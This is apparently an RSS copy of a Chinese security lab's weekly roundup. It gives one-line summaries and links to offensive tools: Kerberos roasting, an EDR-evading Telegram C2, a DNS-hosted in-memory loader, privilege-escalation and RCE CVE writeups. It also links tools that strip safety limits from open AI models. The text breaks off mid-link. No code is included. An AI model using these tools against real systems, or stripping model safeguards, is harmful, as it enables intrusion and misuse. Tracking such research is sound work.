border-box;"><strong style="box-sizing: border-box;"><span leaf="">官方攻防交流群</span></strong></p></div><div style="margin: 10px 0%;box-sizing: border-box;"><div style="font-size: 13px;color: rgb(160, 160, 160);text-align: justify;line-height: 1.6;letter-spacing: 1px;padding: 0px 3px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">网络安全一手资讯</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">攻防技术答疑解惑</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">扫码加好友即可拉群</span></p></div></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=9f105d18&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzkyMTI0NjA3OA%3D%3D%26mid%3D2247494891%26idx%3D1%26sn%3Dfb48fbde89f2d1be8b5a6dd77d35a27a">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 27 Mar 2026 18:00:00 +0800</pubDate>
    </item>
    <item>
      <title>每周蓝军技术推送（2026.3.21-2026.3.27）</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&amp;mid=2247494891&amp;idx=2&amp;sn=9fea43e1c6cc95791e2f62f236fdb987</link>
      <description>关注高级攻防对抗技术热点，研究对手技术进行高级威胁模拟，研判攻击安全发展方向。</description>
      <content:encoded><![CDATA[<p>原创 <span>天元实验室</span> <span>2026-03-27 18:00</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=a972b10c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FTPGibEO8KBwbD5z6C0g2NAp2OicEl3fdbRrPUY2MuWIcreXMC0tGBdfWBviaqDPPyN63iawoWIujD6l1Fx5keMUib4w%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>关注高级攻防对抗技术热点，研究对手技术进行高级威胁模拟，研判攻击安全发展方向。</p>
  <div style="line-height: 1.6;letter-spacing: 0px;padding-right: 0px;padding-left: 0px;box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;font-size: 16px;color: rgb(62, 62, 62);" data-pm-slice="0 0 []"><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.4222222222222222" data-s="300,640" data-type="png" data-w="900" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100011233" src="https://wechat2rss.xlab.app/img-proxy/?k=1ff24fcb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FuZT6kWW1jClktsrS8zK56SLiaQW13DGUx92fxJ6RIa5viavQeaTV3iaXDvxjUMSBfV2FKjFuHgNwjwuz4r4HWwr83NIB9HpyzKcSpZcatwlfdA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 12px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;background-color: rgba(67, 146, 117, 0.14);margin: 3px 0px 0px -20px;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);box-sizing: border-box;"><div style="font-size: 22px;padding: 0px 22px;line-height: 2;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">内网渗透</span></strong></p></div></div></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Krb5RoastParser：从pcap文件中解析Kerberos数据包并提取AS-REQ、AS-REP和TGS-REP哈希</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/jalvarezz13/Krb5RoastParser" target="_blank">https://github.com/jalvarezz13/Krb5RoastParser</a></span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 12px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;background-color: rgba(67, 146, 117, 0.14);margin: 3px 0px 0px -20px;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);box-sizing: border-box;"><div style="font-size: 22px;padding: 0px 22px;line-height: 2;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">终端对抗</span></strong></p></div></div></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">分析Netskope Windows客户端补丁绕过技术，利用反向代理服务实现本地提权</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://blog.amberwolf.com/blog/2026/march/patch-bypass---netskope-client-for-windows---local-privilege-escalation-via-rogue-server/" target="_blank">https://blog.amberwolf.com/blog/2026/march/patch-bypass---netskope-client-for-windows---local-privilege-escalation-via-rogue-server/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">toastnotify-bof：发送Windows toast通知的Beacon Object File (BOF)</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/brmkit/toastnotify-bof" target="_blank">https://github.com/brmkit/toastnotify-bof</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">teletunnel：使用C++编写的Telegram Bot工具，利用Telegram作为C2接口来绕过EDR检测</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/mhdgning131/teletunnel" target="_blank">https://github.com/mhdgning131/teletunnel</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">演示如何将DOOM游戏引擎存储在2000个DNS TXT记录中并通过PowerShell加载器在内存中执行的技术概念验证</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://core-jmp.org/2026/03/can-it-resolve-doom-game-engine-in-2000-dns-records/" target="_blank">https://core-jmp.org/2026/03/can-it-resolve-doom-game-engine-in-2000-dns-records/</a></span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 12px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;background-color: rgba(67, 146, 117, 0.14);margin: 3px 0px 0px -20px;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);box-sizing: border-box;"><div style="font-size: 22px;padding: 0px 22px;line-height: 2;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">漏洞相关</span></strong></p></div></div></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">CVE-2026-20817：Windows错误报告服务本地提权漏洞分析与PoC</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://itm4n.github.io/cve-2026-20817-wersvc-eop/" target="_blank">https://itm4n.github.io/cve-2026-20817-wersvc-eop/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">CVE-2026-32746：GNU inetutils Telnetd预认证远程代码执行漏洞分析</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://labs.watchtowr.com/a-32-year-old-bug-walks-into-a-telnet-server-gnu-inetutils-telnetd-cve-2026-32746/" target="_blank">https://labs.watchtowr.com/a-32-year-old-bug-walks-into-a-telnet-server-gnu-inetutils-telnetd-cve-2026-32746/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">CVE-2026-21992：Oracle Identity Manager和Oracle WebServices Manager高危远程代码执行漏洞</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.tenable.com/blog/cve-2026-21992-critical-out-of-band-oracle-identity-manager-and-oracle-web-services-manager" target="_blank">https://www.tenable.com/blog/cve-2026-21992-critical-out-of-band-oracle-identity-manager-and-oracle-web-services-manager</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">CVE-2026-21514：Microsoft Word OLE绕过漏洞FAQ及在伊朗网络攻击行动中的影响分析</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.tenable.com/blog/faq-on-cve-2026-21514-ole-bypass-n-day-in-microsoft-word" target="_blank">https://www.tenable.com/blog/faq-on-cve-2026-21514-ole-bypass-n-day-in-microsoft-word</a></span></p></div><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.tenable.com/blog/operation-epic-fury-why-exposure-data-changes-everything-about-irans-cyber-kinetic-campaign" target="_blank">https://www.tenable.com/blog/operation-epic-fury-why-exposure-data-changes-everything-about-irans-cyber-kinetic-campaign</a></span></p></div></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;margin: 12px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;align-self: flex-start;background-color: rgba(67, 146, 117, 0.14);margin: 3px 0px 0px -20px;box-sizing: border-box;"><div style="margin: 0px 0%;transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);box-sizing: border-box;"><div style="font-size: 22px;padding: 0px 22px;line-height: 2;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">人工智能和安全</span></strong></p></div></div></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">agent-skills：Elastic公司发布的Skills套件，支持与其云、Elasticsearch等基础设施交互，及安全运营能力</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/elastic/agent-skills" target="_blank">https://github.com/elastic/agent-skills</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">深入探讨本地低权限LLM服务器的部署过程，重点关注底层堆栈安全性</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.synacktiv.com/en/publications/deep-dive-into-the-deployment-of-an-on-premise-low-privileged-llm-server" target="_blank">https://www.synacktiv.com/en/publications/deep-dive-into-the-deployment-of-an-on-premise-low-privileged-llm-server</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">OBLITERATUS：可在几分钟内移除开源AI模型的安全限制，包括相关代码和教程资源</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/elder-plinius/OBLITERATUS" target="_blank">https://github.com/elder-plinius/OBLITERATUS</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">heretic：大语言模型审查自动移除工具</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://github.com/p-e-w/heretic" target="_blank">https://github.com/p-e-w/heretic</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">解释Codex Security为何不包含SAST报告，探讨AI安全工具的设计理念</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://openai.com/index/why-codex-security-doesnt-include-sast/" target="_blank">https://openai.com/index/why-codex-security-doesnt-include-sast/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">分享其开源仓库遭遇AI代理恶意贡献攻击的检测与防御经验，提供开源维护者的安全建议</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://www.datadoghq.com/blog/engineering/stopping-hackerbot-claw-with-bewaire/" target="_blank">https://www.datadoghq.com/blog/engineering/stopping-hackerbot-claw-with-bewaire/</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">介绍使用自主AI代理自动检测和修复代码库安全漏洞的架构与实践</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://cursor.com/blog/security-agents" target="_blank">https://cursor.com/blog/security-agents</a></span></p></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="letter-spacing: 1px;padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">介绍其AI驱动的安全漏洞自动修复系统，在6天内自动修复约100个安全问题</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-width: 0px;padding: 0px 0px 0px 14px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;width: 100%;border-left: 1px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;padding: 6px 0px 20px 13px;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(84, 75, 110);letter-spacing: 1.8px;line-height: 1.8;padding: 0px;width: 100%;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf=""><a href="https://builders.ramp.com/post/100-vulnerabilities-patched-with-0-humans" 